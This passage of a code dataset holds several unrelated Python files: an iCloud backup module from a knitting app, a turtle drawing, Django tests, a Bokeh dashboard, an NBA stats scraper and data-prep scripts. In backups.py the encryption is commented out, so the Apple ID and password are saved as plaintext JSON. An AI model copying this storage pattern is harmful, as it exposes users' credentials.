on_release=self.dialog_icloud_login_dismiss),\n MDFlatButton(\n text=\"Save\",\n on_release=self.dialog_icloud_login_save)])\n \n self.icloud_login_dialog.open()\n\n\n def dialog_icloud_auth_dismiss(self, inst):\n '''\n dismiss the dialog\n '''\n self.icloud_auth_dialog.dismiss()\n\n\n def dialog_icloud_login_dismiss(self, inst):\n '''\n dismiss the dialog\n '''\n self.icloud_login_dialog.dismiss()\n\n \n def dialog_icloud_login_save(self, inst):\n '''\n encrypt and save login details\n \n '''\n self.apple_id = self.icloud_login_dialog.content_cls.ids.apple_id.text\n self.apple_password = self.icloud_login_dialog.content_cls.ids.apple_password.text\n self.icloud_write_encrypted()\n\n self.icloud_login_dialog.dismiss()\n \n\n self.icloud_auth() \n\n if self.icloud:\n if not self.icloud.is_trusted_session:\n self.dialog_icloud_auth()\n\n\n def icloud_write_encrypted(self):\n '''\n '''\n\n data = {\"apple_id\":self.apple_id,\n \"apple_password\": self.apple_password}\n \n # data_bytes = json.dumps(data).encode('utf-8')\n # encrypted = self.fernet.encrypt(data_bytes)\n # with open(self.encrypted_filepath, 'wb') as f:\n # f.write(encrypted)\n\n with open(self.encrypted_filepath, 'w') as f:\n json.dump(data, f)\n\n def icloud_read_encrypted(self):\n '''\n '''\n if not os.path.exists(self.encrypted_filepath):\n self.apple_id = ''\n self.apple_password = ''\n self.icloud_write_encrypted()\n \n with open(self.encrypted_filepath, 'r') as f:\n data_dict = json.load(f)\n \n # with open(self.encrypted_filepath, 'rb') as f:\n # data = f.read()\n # decrypted = self.fernet.decrypt(data)\n # data_dict = json.loads(decrypted.decode('utf8'))\n \n\n self.apple_id = data_dict['apple_id']\n self.apple_password = data_dict['apple_password']\n \n \n \n \n def dialog_icloud_2f(self, inst):\n '''\n use input from the dialog to do 2 factor authentication\n \n '''\n self.api_code = self.icloud_auth_dialog.content_cls.ids.edit_field.text\n\n result = self.icloud.validate_2fa_code(self.api_code)\n \n if not result:\n self.dialog()\n \n elif not self.icloud.is_trusted_session:\n self.dialog(\n text=\"Session is not trusted. Requesting trust...\") \n result = self.icloud.trust_session()\n \n if not result:\n self.dialog(\n text=\"Failed to request trust. You will likely be prompted for the code again in the coming weeks\")\n\n elif self.icloud_action == 'backup':\n \n self.dialog(title='Authenticated' ,\n text='Proceeding with backup')\n \n\n self.dialog_icloud_auth_dismiss(inst)\n \n # try the backup again once authenticated\n if self.icloud_action == 'backup':\n self.project_backup() \n \n \n def icloud_backup(self):\n '''\n ''' \n self.zip_project()\n \n app_dir = self.icloud.drive[self.app_name]\n \n if not self.wk_project_name in app_dir.dir():\n app_dir.mkdir(self.wk_project_name)\n self.icloud_read()\n app_dir = self.icloud.drive[self.app_name]\n\n project_dir = app_dir[self.wk_project_name]\n \n file = self.zip_filename\n \n with open(file, 'rb') as f:\n project_dir.upload(f)\n \n os.rename(self.zip_filename,self.backup_path)\n\n self.project_del_local_backup()\n self.project_del_icloud_backup()\n\n\n def icloud_download(self, file):\n '''\n '''\n","repo_name":"jpbakken/KnitApp","sub_path":"App/mixins/backups.py","file_name":"backups.py","file_ext":"py","file_size_in_byte":8938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"29299854636","text":"import turtle\n\nt = turtle.Turtle()\nscreen = turtle.Screen()\nscreen.setup(width=800, height=500)\nscreen.bgcolor('black')\nscreen.tracer(False)\n\n\n\ndef slonce():\n t.penup() \n t.goto(300, 130)\n t.fillcolor(\"yellow\")\n t.pendown()\n t.begin_fill()\n t.circle(50)\n t.end_fill()\n\ndef pien():\n t.penup() \n t.goto(-155, -200)\n t.pendown()\n t.color(\"brown\")\n t.begin_fill()\n t.forward(50)\n t.right(90)\n t.forward(400)\n t.right(90)\n t.forward(50)\n t.right(90)\n t.forward(400)\n t.end_fill()\n\ndef korona_drzewa():\n t.penup() \n t.goto(-180, -50)\n t.pendown()\n t.backward(100)\n t.left(90)\n t.color('green')\n t.begin_fill()\n t.circle(80)\n t.end_fill()\n\n\ndef trawa():\n t.home()\n t.backward(400)\n t.right(90)\n t.forward(300)\n t.begin_fill()\n t.color('lightgreen')\n t.left(90)\n t.forward(800)\n t.left(90)\n t.forward(100)\n t.left(90)\n t.forward(800)\n t.end_fill()\n\ndef domek():\n t.penup() \n t.goto(50, 0)\n t.pendown()\n t.begin_fill()\n t.color('#e6e6e6')\n t.forward(200) \n t.right(90)\n t.forward(200)\n t.right(90)\n t.forward(200)\n t.right(90)\n t.forward(200)\n t.end_fill()\n\ndef dach():\n t.penup() \n t.goto(50,0)\n t.pendown()\n t.begin_fill()\n t.color('red')\n t.forward(200)\n t.left(120)\n t.forward(200)\n t.left(120)\n t.forward(200)\n t.left(120)\n t.end_fill()\n \ndef okno1():\n t.penup() \n t.goto(210,-95)\n t.pendown()\n t.begin_fill()\n t.color('yellow')\n t.forward(40)\n t.left(90)\n t.forward(40)\n t.left(90)\n t.forward(40)\n t.left(90)\n t.forward(40)\n t.left(90)\n t.end_fill()\n\ndef okno2():\n t.penup() \n t.goto(135,-95)\n t.pendown()\n t.begin_fill()\n t.color('yellow')\n t.forward(40)\n t.left(90)\n t.forward(40)\n t.left(90)\n t.forward(40)\n t.left(90)\n t.forward(40)\n t.left(90)\n t.end_fill()\n\ndef drzwi():\n t.penup() \n t.goto(172.5,-200)\n t.pendown()\n t.begin_fill()\n t.color('orange')\n t.forward(60)\n t.left(90)\n t.forward(40)\n t.left(90)\n t.forward(60)\n t.left(90)\n t.forward(40)\n t.left(90)\n t.end_fill()\n\nslonce()\ntrawa()\npien()\nkorona_drzewa()\ndach()\ndomek()\nokno1()\nokno2()\ndrzwi()\n\n\n\nscreen.update()\nscreen.exitonclick()\n\n","repo_name":"MateuszKi/podsgrafkomp","sub_path":"LAB1 - Obrazek.py","file_name":"LAB1 - Obrazek.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"36679409557","text":"\nfrom src.OBJECTS.DATABASE.COLUMN import COLUMN\n\nclass TABLE(object):\n def __init__(self, SCHEMA, name, data, ACTION = [], POST_ACTION = []):\n \"\"\"\n __init__(self, SCHEMA, name, data):\n SCHEMA::src.OBJECTS.SCHEMA.SCHEMA - schema object defined\n ---@ scd/src/OBJECTS/SCHEMA\n name::string\n data::pandas.DataFrame - Filtered data queried from src.CONNECT object\n\n attributes:\n _update::bool - Update flag\n _schema::src.OBJECTS.SCHEMA.SCHEMA\n _name::string - Table name\n _data::pandas.DataFrame - Filtered data queried from src.CONNECT object\n _dir::string - File to map table to.\n read_data::list - list of strings of names of children\n _data::pandas.DataFrame - Filtered data queried from src.CONNECT object\n _children::list - list of src.OBJECT.COLUMN objects\n\n function: Attribute nessesary state to src.OBJECT.TABLE.TABLE\n object, check the existance of such a table in currently stored\n images, and construct src.OBJECTS.TABLE.TABLE objects. Upon comp-\n letion of the construction of src.OBJECT.COLUMN.COLUMN objects, if\n any of those children triggered the _update attribute to trigger, \n We then construct that file and write the contents of the rendered \n template to that file.\n\n returns - self\n \"\"\"\n self.update = False\n self._parent = SCHEMA\n self._name = name\n self._ACTION = ACTION\n self._POST_ACTION = POST_ACTION\n self._actions = {action.__name__ : action(self).O().__act__() for action in ACTION}\n self._data = data; self._children = self.construct_children(); del self._data\n self._post_actions = {action.__name__ : action(self).O().__act__() for action in POST_ACTION}\n\n def __getitem__(self, item):\n \"\"\"\n __getitem__(self, item)\n item::int\n\n function: Afford src.OBJECT.DATABASE.DATABASE itterable\n behaviors for use in loops.\n\n returns - src.OBJECT.SCHEMA.SCHEMA\n \"\"\"\n return self._children[item]\n\n def construct_children(self):\n \"\"\"\n construct_schemas(self)\n\n function: find the unique SCHEMA names in the connected \n DATABASE and instanciate src.OBJECTS.SCHEMA.SCHEMA\n objects for each of those names. See src.OBJECTS.\\\n SCHEMA.SCHEMA for further details.\n\n \"\"\"\n unique_children = self._data['COLUMN_NAME'].unique()\n return [\n COLUMN(\n self,\n column,\n self._data[\n self._data['COLUMN_NAME'] == column\n ],\n self._ACTION,\n self._POST_ACTION\n )\n for column in unique_children\n ]\n","repo_name":"OpenJ92/dbm","sub_path":"src/OBJECTS/DATABASE/TABLE.py","file_name":"TABLE.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"14670714569","text":"from datetime import UTC, date, datetime, timedelta\nfrom unittest.mock import MagicMock, patch\n\nfrom django.test import RequestFactory, TestCase, override_settings\nfrom django.urls import reverse\n\nfrom emails.actions import instructor_training_approaching_receiver\nfrom emails.models import EmailTemplate, ScheduledEmail\nfrom emails.signals import (\n INSTRUCTOR_TRAINING_APPROACHING_SIGNAL_NAME,\n instructor_training_approaching_signal,\n)\nfrom workshops.models import Event, Organization, Person, Role, Tag, Task\nfrom workshops.tests.base import TestBase\n\n\nclass TestInstructorTrainingApproachingReceiver(TestCase):\n def setUp(self) -> None:\n self.template = EmailTemplate.objects.create(\n name=\"Test Email Template\",\n signal=INSTRUCTOR_TRAINING_APPROACHING_SIGNAL_NAME,\n from_header=\"workshops@carpentries.org\",\n cc_header=[\"team@carpentries.org\"],\n bcc_header=[],\n subject=\"Greetings\",\n body=\"Hello! Nice to meet **you**.\",\n )\n ttt_organization = Organization.objects.create(\n domain=\"carpentries.org\", fullname=\"Instructor Training\"\n )\n self.event = Event.objects.create(\n slug=\"test-event\",\n host=Organization.objects.create(domain=\"example.com\", fullname=\"Example\"),\n administrator=ttt_organization,\n start=date.today() + timedelta(days=30),\n )\n ttt_tag = Tag.objects.create(name=\"TTT\")\n self.event.tags.add(ttt_tag)\n instructor_role = Role.objects.create(name=\"instructor\")\n self.instructor1 = Person.objects.create(\n personal=\"Test\", family=\"Test\", email=\"test1@example.org\", username=\"test1\"\n )\n self.instructor2 = Person.objects.create(\n personal=\"Test\", family=\"Test\", email=\"test2@example.org\", username=\"test2\"\n )\n Task.objects.create(\n event=self.event, person=self.instructor1, role=instructor_role\n )\n Task.objects.create(\n event=self.event, person=self.instructor2, role=instructor_role\n )\n\n @patch(\"emails.actions.base_action.logger\")\n def test_disabled_when_no_feature_flag(self, mock_logger) -> None:\n # Arrange\n request = RequestFactory().get(\"/\")\n with self.settings(FLAGS={\"EMAIL_MODULE\": [(\"boolean\", False)]}):\n # Act\n instructor_training_approaching_receiver(None, request=request)\n # Assert\n mock_logger.debug.assert_called_once_with(\n \"EMAIL_MODULE feature flag not set, skipping \"\n \"instructor_training_approaching\"\n )\n\n def test_receiver_connected_to_signal(self) -> None:\n # Arrange\n original_receivers = instructor_training_approaching_signal.receivers[:]\n\n # Act\n # attempt to connect the receiver\n instructor_training_approaching_signal.connect(\n instructor_training_approaching_receiver\n )\n new_receivers = instructor_training_approaching_signal.receivers[:]\n\n # Assert\n # the same receiver list means this receiver has already been connected\n self.assertEqual(original_receivers, new_receivers)\n\n @override_settings(FLAGS={\"EMAIL_MODULE\": [(\"boolean\", True)]})\n def test_action_triggered(self) -> None:\n # Arrange\n request = RequestFactory().get(\"/\")\n\n # Act\n with patch(\n \"emails.actions.base_action.messages_action_scheduled\"\n ) as mock_messages_action_scheduled:\n instructor_training_approaching_signal.send(\n sender=self.event,\n request=request,\n event=self.event,\n event_start_date=self.event.start,\n )\n\n # Assert\n scheduled_email = ScheduledEmail.objects.get(template=self.template)\n mock_messages_action_scheduled.assert_called_once_with(\n request,\n INSTRUCTOR_TRAINING_APPROACHING_SIGNAL_NAME,\n scheduled_email,\n )\n\n @override_settings(FLAGS={\"EMAIL_MODULE\": [(\"boolean\", True)]})\n @patch(\"emails.actions.base_action.messages_action_scheduled\")\n @patch(\"emails.actions.instructor_training_approaching.one_month_before\")\n def test_email_scheduled(\n self,\n mock_one_month_before: MagicMock,\n mock_messages_action_scheduled: MagicMock,\n ) -> None:\n # Arrange\n request = RequestFactory().get(\"/\")\n signal = INSTRUCTOR_TRAINING_APPROACHING_SIGNAL_NAME\n context = {\n \"event\": self.event,\n \"instructors\": [self.instructor1, self.instructor2],\n }\n scheduled_at = datetime(2023, 8, 5, 12, 0, tzinfo=UTC)\n mock_one_month_before.return_value = scheduled_at\n\n # Act\n with patch(\n \"emails.actions.base_action.EmailController.schedule_email\"\n ) as mock_schedule_email:\n instructor_training_approaching_signal.send(\n sender=self.event,\n request=request,\n event=self.event,\n event_start_date=self.event.start,\n )\n\n # Assert\n mock_schedule_email.assert_called_once_with(\n signal=signal,\n context=context,\n scheduled_at=scheduled_at,\n to_header=[self.instructor1.email, self.instructor2.email],\n generic_relation_obj=self.event,\n author=None,\n )\n\n @override_settings(FLAGS={\"EMAIL_MODULE\": [(\"boolean\", True)]})\n @patch(\"emails.actions.base_action.messages_missing_recipients\")\n def test_missing_recipients(\n self, mock_messages_missing_recipients: MagicMock\n ) -> None:\n # Arrange\n self.instructor1.email = None\n self.instructor1.save()\n self.instructor2.email = None\n self.instructor2.save()\n request = RequestFactory().get(\"/\")\n signal = INSTRUCTOR_TRAINING_APPROACHING_SIGNAL_NAME\n\n # Act\n instructor_training_approaching_signal.send(\n sender=self.event,\n request=request,\n event=self.event,\n event_start_date=self.event.start,\n )\n\n # Assert\n mock_messages_missing_recipients.assert_called_once_with(request, signal)\n\n @override_settings(FLAGS={\"EMAIL_MODULE\": [(\"boolean\", True)]})\n @patch(\"emails.actions.base_action.messages_missing_template\")\n def test_missing_template(self, mock_messages_missing_template: MagicMock) -> None:\n # Arrange\n request = RequestFactory().get(\"/\")\n self.template.delete()\n signal = INSTRUCTOR_TRAINING_APPROACHING_SIGNAL_NAME\n\n # Act\n instructor_training_approaching_signal.send(\n sender=self.event,\n request=request,\n event=self.event,\n event_start_date=self.event.start,\n )\n\n # Assert\n mock_messages_missing_template.assert_called_once_with(request, signal)\n\n\nclass TestInstructorTrainingApproachingReceiverIntegration(TestBase):\n @override_settings(FLAGS={\"EMAIL_MODULE\": [(\"boolean\", True)]})\n def test_integration(self) -> None:\n # Arrange\n self._setUpRoles()\n self._setUpTags()\n self._setUpUsersAndLogin()\n\n template = EmailTemplate.objects.create(\n name=\"Test Email Template\",\n signal=INSTRUCTOR_TRAINING_APPROACHING_SIGNAL_NAME,\n from_header=\"workshops@carpentries.org\",\n cc_header=[\"team@carpentries.org\"],\n bcc_header=[],\n subject=\"Greetings\",\n body=\"Hello! Nice to meet **you**.\",\n )\n\n ttt_organization = Organization.objects.create(\n domain=\"carpentries.org\", fullname=\"Instructor Training\"\n )\n event = Event.objects.create(\n slug=\"test-event\",\n host=Organization.objects.create(domain=\"example.com\", fullname=\"Example\"),\n administrator=ttt_organization,\n start=date.today() + timedelta(days=30),\n )\n ttt_tag = Tag.objects.get(name=\"TTT\")\n event.tags.add(ttt_tag)\n\n instructor1 = Person.objects.create(\n personal=\"Kelsi\",\n middle=\"\",\n family=\"Purdy\",\n username=\"purdy_kelsi\",\n email=\"purdy.kelsi@example.com\",\n secondary_email=\"notused@amy.org\",\n gender=\"F\",\n airport=self.airport_0_0,\n github=\"purdy_kelsi\",\n twitter=\"purdy_kelsi\",\n url=\"http://kelsipurdy.com/\",\n affiliation=\"University of Arizona\",\n occupation=\"TA at Biology Department\",\n orcid=\"0000-0000-0000\",\n is_active=True,\n )\n instructor2 = Person.objects.create(\n personal=\"Jayden\",\n middle=\"\",\n family=\"Deckow\",\n username=\"deckow_jayden\",\n email=\"deckow.jayden@example.com\",\n secondary_email=\"notused@example.org\",\n gender=\"M\",\n airport=self.airport_0_50,\n github=\"deckow_jayden\",\n twitter=\"deckow_jayden\",\n url=\"http://jaydendeckow.com/\",\n affiliation=\"UFlo\",\n occupation=\"Staff\",\n orcid=\"0000-0000-0001\",\n is_active=True,\n )\n instructor_role = Role.objects.get(name=\"instructor\")\n Task.objects.create(event=event, person=instructor1, role=instructor_role)\n\n url = reverse(\"task_add\")\n payload = {\n \"task-event\": event.pk,\n \"task-person\": instructor2.pk,\n \"task-role\": instructor_role.pk,\n }\n\n # Act\n rv = self.client.post(url, data=payload)\n\n # Arrange\n self.assertEqual(rv.status_code, 302)\n ScheduledEmail.objects.get(template=template)\n","repo_name":"carpentries/amy","sub_path":"amy/emails/tests/actions/test_instructor_training_approaching_receiver.py","file_name":"test_instructor_training_approaching_receiver.py","file_ext":"py","file_size_in_byte":9826,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"29"} +{"seq_id":"12722847830","text":"import glob\nimport os\n\nimport pandas\nfrom bokeh.io import curdoc\nfrom bokeh.layouts import row, column\nfrom bokeh.models import Band\nfrom bokeh.models import ColumnDataSource, Select\nfrom bokeh.models import TableColumn, DataTable\nfrom bokeh.plotting import figure\n\ngrid_search_path = 'results/grid_search_1122_1128'\n\n# output_file(\"test.html\", title=\"Test\")\n\n\n# In[13]:\n\n\ncsv_files = sorted(glob.glob(os.path.join(grid_search_path, 'experiment*.csv')))\n# Replace Nan values with '' to avoid JSON serialization error\ncsvs = [pandas.read_csv(c).fillna('None') for c in csv_files]\n\n# Get csv file names in a dict\ncsv_names = {}\nfor i, f in enumerate(csv_files):\n csv_names[f[-10:-4]] = {\n 'file_name': f,\n 'id': i\n }\n\n\n# In[14]:\n\n\ndef get_dataset(exp_id):\n df = csvs[exp_id]\n\n df['lower'] = df['valid_acc_mean'] - 2 * df['valid_acc_std']\n df['upper'] = df['valid_acc_mean'] + 2 * df['valid_acc_std']\n\n return ColumnDataSource(df.reset_index())\n\n\n# In[15]:\n\n\ndef update_plot(attrname, old, new):\n exp = experiment_select.value\n\n exp_id = csv_names[exp]['id']\n src = get_dataset(exp_id)\n\n experiment_source.data.update(src.data)\n\n\n# In[21]:\n\n\ndef make_plot(source):\n TOOLS = \"pan,wheel_zoom,box_zoom,reset,save\"\n\n p = figure(plot_width=1000, plot_height=600, tools=TOOLS)\n p.scatter(x='0', y='valid_acc_mean', fill_alpha=0.3, size=5, source=source)\n\n band = Band(base='0', lower='lower', upper='upper', source=source, level='underlay',\n fill_alpha=1.0, line_width=1, line_color='black')\n p.add_layout(band)\n\n p.title.text = 'Grid Search {}'.format(grid_search_path)\n p.xgrid[0].grid_line_color = None\n p.ygrid[0].grid_line_alpha = 0.5\n p.xaxis.axis_label = 'epoch'\n p.yaxis.axis_label = 'valid_acc'\n\n return p\n\n\ndef get_summary_table():\n summary = pandas.DataFrame(columns=['exp_name', 'final_acc', 'final_std'])\n\n for i, c in enumerate(csvs):\n exp_name = [list(csv_names.keys())[i]]\n\n # with patience set to 100 in EarlyStopper callback, valid_acc is spposed not to move in the last 100 epochs\n c_final = c.iloc[-100:, :].mean()\n\n final_acc = [c_final['valid_acc_mean']]\n final_std = [c_final['valid_acc_std']]\n\n summary = pandas.concat([summary, pandas.DataFrame({\n 'exp_name': exp_name,\n 'final_acc': final_acc,\n 'final_std': final_std,\n })])\n\n return ColumnDataSource(summary.reset_index())\n\n\n# In[22]:\n\n\n# Summary table\ntable_source = get_summary_table()\ncolumns = [\n TableColumn(field=\"exp_name\", title=\"Experiment\"),\n TableColumn(field=\"final_acc\", title=\"Accuracy\"),\n TableColumn(field=\"final_std\", title=\"Std\"),\n]\ndata_table = DataTable(source=table_source, columns=columns, width=600, height=600)\n\n# Selected experiment graph\nexperiment_select = Select(value='0', title='Experiment', options=sorted(csv_names.keys()))\n\nexperiment_source = get_dataset(exp_id=0)\nplot = make_plot(experiment_source)\n\nexperiment_select.on_change('value', update_plot)\ncontrols = column(experiment_select)\n\n# HTML layout\ncurdoc().add_root(row(column(plot, controls), data_table))\ncurdoc().title = \"Grid Search Results\"\n","repo_name":"alxthm/S3R","sub_path":"scripts/plot_acc_graphs.py","file_name":"plot_acc_graphs.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"7441347633","text":"'''\n프로그래머스 Level 1. 핸드폰 번호 가리기\n'''\n\ndef solution(phone_number):\n answer = ''\n count = 0\n n = len(phone_number)\n for num in range(n-1,-1,-1):\n if count < 4:\n char = phone_number[num]\n else:\n char = '*'\n count += 1\n answer = char + answer\n return answer\n\nprint(solution(\"027778888\"))","repo_name":"hj-k66/CodingTest","sub_path":"Programmers/LV1/핸드폰번호가리기.py","file_name":"핸드폰번호가리기.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"24405485621","text":"# -*- coding: utf-8 -*-\n\"\"\"\n _ _ ____ _____ _ _____ \n | \\ | | _ \\ /\\ / ____| | | / ____| \n | \\| | |_) | / \\ | | __ __ _ _ __ ___ ___| | ___ __ _ | (___ ___ _ __ __ _ _ __ ___ _ __ \n | . ` | _ < / /\\ \\ | | |_ |/ _` | '_ ` _ \\ / _ \\ |/ _ \\ / _` | \\___ \\ / __| '__/ _` | '_ \\ / _ \\ '__|\n | |\\ | |_) / ____ \\ | |__| | (_| | | | | | | __/ | (_) | (_| | ____) | (__| | | (_| | |_) | __/ | \n |_| \\_|____/_/ \\_\\ \\_____|\\__,_|_| |_| |_|\\___|_|\\___/ \\__, | |_____/ \\___|_| \\__,_| .__/ \\___|_| \n __/ | | | \n |___/ |_| \n\"\"\"\n\nimport pandas as pd\nfrom sqlalchemy import types\nimport datetime\nfrom secure_scraper_setup import oracleCreator, alchemyCreator, isNumber, table_scrape, dateDiff\n\n#load database connections from secure file\nengine = alchemyCreator()\noracle_con = oracleCreator()\noracle_cur = oracle_con.cursor()\n\n#get max date from gamelog dataset\noracle_query = \"\"\"select EXTRACT(YEAR from MAX(GAME_DATE)+1) as YEARID,\nEXTRACT(MONTH from MAX(GAME_DATE)+1) as MONTHID ,\nEXTRACT(DAY from MAX(GAME_DATE)+1) as DAYID \nfrom NBA_GAMELOG\"\"\" #only select 2010 or later\ndf_date = pd.read_sql_query(oracle_query,oracle_con) #build dataframe from query;\n\n#close cursor and connection\noracle_cur.close()\noracle_con.close()\n\n#define HTML attributes for scraping\ntableHead = 'thead'\ntableHeadRow = 'tr'\ntableHeadCell = 'th'\ntableBody = 'tbody'\ntableBodyRow = 'tr'\ntableBodyCell = 'td'\n\n#loop through URL's generated by dateDiff using max date query results as inputs\nfor url in dateDiff(df_date.iloc[0]['MONTHID'],df_date.iloc[0]['DAYID'],df_date.iloc[0]['YEARID']):\n #open a new oracle connection/cursor each loop to avoid timeouts\n oracle_con = oracleCreator()\n oracle_cur = oracle_con.cursor()\n #scrape the page\n try:\n header = table_scrape('header',url,tableHead,tableHeadRow,tableHeadCell,tableBody,tableBodyRow,tableBodyCell)\n body = table_scrape('body',url,tableHead,tableHeadRow,tableHeadCell,tableBody,tableBodyRow,tableBodyCell)\n \n for i,iBody in enumerate(body):\n if isNumber(iBody[0]):\n for x, iCell in enumerate(iBody):\n if iCell is None:\n body[i][x] = float(0)\n else:\n if isNumber(iCell):\n body[i][x] = float(iCell)\n else:\n body.remove(iBody)\n df = pd.DataFrame(data = body, columns = header)\n df = df.rename(columns={\"Date\": \"GAME_DATE\", \"FG%\": \"FGP\", \"3P\": \"TP\", \"3PA\": \"TPA\", \"3P%\": \"TPP\", \"+/-\": \"PM\", \"FT%\": \"FTP\"}) #get rid of weird characters in column names \n df = df.fillna(0.0) #fill any blank stats with 0 \n df['MP'] = df['MP'].apply(lambda x: round((float((str(x)+\":0\").split(\":\")[0]) + float((str(x)+\":0\").split(\":\")[1])/100*1.667),2)) #convert minutes played to number\n df = df.apply(lambda x: x.replace(u'\\xa0', u' ')) #replace odd ascii characters to prevent Oracle errors\n #convert number fields to floats (from string objects)\n for col in ['FG','FGA','FGP','TP','TPA','TPP','FT','FTA','FTP','ORB','DRB','TRB','AST','STL','BLK','TOV','PF','PTS','GmSc','MP']:\n df[col] = df[col].apply(lambda x: float(x))\n\n #extract date from URL\n df['GAME_DATE'] = url.replace('https://www.basketball-reference.com/friv/dailyleaders.fcgi?month=','').replace('&day=','/').replace('&year=','/') \n\n #remove unneeded columns \n df = df[['Rk','Player','Tm','Opp','FG','FGA','FGP','TP','TPA','TPP','FT','FTA','FTP','ORB','DRB','TRB','AST','STL','BLK','TOV','PF','PTS','GmSc','MP','GAME_DATE']]\n df = df.applymap(str) #change everything to a string to load into buffer tables smoothly\n \n #prepare datatype for SQL insertion \n dtyp = {c:types.VARCHAR(df[c].str.len().max())\n for c in df.columns[df.dtypes == 'object'].tolist()}\n \n #perform SQL insertion\n try: \n date = url.replace('https://www.basketball-reference.com/friv/dailyleaders.fcgi?month=','').replace('&day=','/').replace('&year=','/')\n df.to_sql('nba_buffer_gamelog', engine, index=False, if_exists='append',dtype = dtyp, chunksize = 100)\n print('-Imported date: ' + date)\n except BaseException as e:\n print('-Failed to write to Oracle: '+ str(e))\n oracle_cur.close()\n oracle_con.close()\n except BaseException as e:\n fail_date = url.replace('https://www.basketball-reference.com/friv/dailyleaders.fcgi?month=','').replace('&day=','/').replace('&year=','/')\n print('-Fail on date ' + fail_date + ': '+ str(e))\n \n#open final Oracle connection to perform buffer procedure \noracle_con = oracleCreator()\noracle_cur = oracle_con.cursor()\ntry:\n oracle_cur.execute('BEGIN NBA_PARSE_BUFFER_GAMELOG(); END;')\n print('-NBA_PARSE_BUFFER_GAMELOG complete'+\" : \"+str(datetime.datetime.now()))\nexcept BaseException as e:\n print('Buffer procedures failed')\n print(str(e))\ntry:\n oracle_cur.execute('BEGIN NBA_UPDATE_GAMELOG_SEASON(); END;')\n print('-NBA_UPDATE_GAMELOG_SEASON complete'+\" : \"+str(datetime.datetime.now()))\nexcept BaseException as e:\n print('Buffer procedures failed')\n print(str(e))\ntry:\n oracle_cur.execute('BEGIN NBA_UPDATE_GAMELOG_G_COUNT(); END;')\n print('-NBA_UPDATE_GAMELOG_G_COUNT complete'+\" : \"+str(datetime.datetime.now()))\nexcept BaseException as e:\n print('Buffer procedures failed')\n print(str(e))\ntry:\n oracle_cur.execute('BEGIN NBA_UPDATE_PREV_GAMES(); END;')\n print('-NBA_UPDATE_PREV_GAMES complete'+\" : \"+str(datetime.datetime.now()))\nexcept BaseException as e:\n print('Buffer procedures failed')\n print(str(e))\ntry:\n oracle_cur.execute('BEGIN NBA_UPDATE_STAT_BASE(); END;')\n print('-NBA_UPDATE_STAT_BASE complete'+\" : \"+str(datetime.datetime.now()))\nexcept BaseException as e:\n print('Buffer procedures failed')\n print(str(e))\n \noracle_cur.close()\noracle_con.close()\nprint('-Finished'+\" : \"+str(datetime.datetime.now()))\n \n\n \n \n","repo_name":"talktotfp/dfs_nba","sub_path":"basic_beautiful_soup/bball_ref_scraper_complete.py","file_name":"bball_ref_scraper_complete.py","file_ext":"py","file_size_in_byte":6450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"7140177854","text":"# import required libraries\nimport pandas as pd\nimport json\n\n\n# Read the dataset\ndf= pd.read_csv(\"data/BERT_QA_corrected.csv\")\n\n\n# Data Transformation (Convert data into required json format for processing)\n# create input 'intents.json' file\nintent_json={}\nlist_of_tags=[]\n# loop through the dataframe to fetch the patterns and responses for each tag\nfor i in range(0, len(df['tag'].unique())):\n d={}\n d['tag']=df['tag'].unique()[i]\n d['patterns']=df.loc[df['tag']==df['tag'].unique()[i], 'question'].tolist()\n d['responses']=df.loc[df['tag']==df['tag'].unique()[i], 'context'].tolist()\n d['context']=[\"\"]\n list_of_tags.append(d) \nintent_json['intents']=list_of_tags\nprint(intent_json)\n\n\n# Save json file\nwith open(\"data/intents.json\", \"w\") as fp:\n json.dump(intent_json,fp)","repo_name":"Nikita-Pardeshi/dsan_chatbot","sub_path":"chatbot_data_formatting.py","file_name":"chatbot_data_formatting.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"37371479229","text":"import sys\nimport pandas as pd\nimport numpy as np\nimport sqlalchemy as sql\n\ndef load_data(messages_filepath, categories_filepath):\n \"\"\"\n Load the files containing the messages and the categories and combine them in one dataframe using the \"id\" column as key\n \n Args:\n messages_filepath: The messages file\n categories_filepath: The categories file\n \n Returns:\n df: The combined dataframe\n \"\"\"\n messages = pd.read_csv(messages_filepath)\n categories = pd.read_csv(categories_filepath)\n df = messages.set_index(\"id\").join(categories.set_index(\"id\"))\n return df\n \ndef clean_data(df):\n \"\"\"\n Cleans the dataframe:\n -Splits each category into its own column and naming it accordingly. \n -converts values to binary (and corrects the values >1 to 1). \n -Drops duplicates.\n \n Args:\n df: Merged messages and categories dataframe\n \n Returns:\n df: Clean dataframe\n \"\"\"\n categories = df.categories.str.split(pat=\";\",expand=True)\n row = categories.iloc[0,:]\n category_colnames = [names[:-2] for names in row]\n categories.columns = category_colnames\n for column in categories.columns:\n # set each value to be the last character of the string\n categories[column] = categories[column].str[-1]\n # convert column from string to numeric\n categories[column] = categories[column].astype(\"int\")\n df.drop([\"categories\"], axis=1, inplace = True) #delete the initial catagory column\n df = df.join(categories) #add the cleaned catagory columns to the dataframe\n improper_values = df.loc[df.related==2].related.index # filter the cells with a value of 2 instead of 1\n df.loc[improper_values,\"related\"]=1 # convert these values to 1\n df = df.drop_duplicates()\n return df\n\ndef save_data(df, database_filename):\n \"\"\" \n Stores the dataframe into a SQLite database,\n \n Args:\n df: the cleaned dataframe\n database_filename : destination path of SQLite database file.\n \"\"\"\n engine = sql.create_engine(f\"sqlite:///{database_filename}\")\n df.to_sql('NLP_Table', engine, index=False) \n\ndef main():\n if len(sys.argv) == 4:\n\n messages_filepath, categories_filepath, database_filepath = sys.argv[1:]\n\n print('Loading data...\\n MESSAGES: {}\\n CATEGORIES: {}'\n .format(messages_filepath, categories_filepath))\n 